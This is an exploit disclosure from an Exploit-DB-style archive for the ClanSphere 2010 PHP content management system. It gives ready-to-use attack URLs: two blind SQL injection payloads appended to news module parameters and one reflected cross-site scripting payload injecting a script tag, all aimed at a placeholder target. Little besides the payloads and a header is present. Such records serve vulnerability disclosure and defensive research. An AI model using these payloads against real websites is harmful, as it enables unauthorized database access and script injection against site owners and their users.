ClanSphere 2010 - Multiple Vulnerabilities

EDB-ID:

14742

CVE:

67414

Author:

Sweet

Type:

webapps

Platform:

PHP

Published:

2010-08-25

############################################################################
#                                                                          #
# Exploit Title: Clansphere Multiple vulnerabilities                       #
#                                                                          #
# Date: 24/08/2010                                                         #
#                                                                          #
# Author: Sweet                                                            #
#                                                                          #
# Contact : charif38@hotmail.fr                                            #
#                                                                          #
# Software Link:                                                           #
#                                                                          # 
# Download:http: http://sourceforge.net/projects/clansphere/               #
#                                                                          # 
# Version: all                                                             #
#                                                                          #
# Tested on: WinXp sp3                                                     #
#                                                                          #
# Risk : HIGHT                                                             #
#                                                                          #
#                                                                          #
# Description :  clansphere offers some nice features for                  # 
#                                                                          #
# you to easily set up and maintain your proper clan site within minutes!  #
#                                                                          #
############################################################################

1- Blind Sql injection :

http://www.target.com/clanspherepath/index.php?mod=news&action=recent&id=0&from=list'+and+31337-31337=0+--+

http://www.target.com/clansphere/index.php?mod=news&action=recent&year=2009&month=8"+and+31337-31337=0+--+

2-Xss :

http://www.target.com/clansphere/index.php/>"><ScRiPt>alert("sweet")</ScRiPt>


Saha Ftourkoum et 1,2,3 viva L'Algerie :))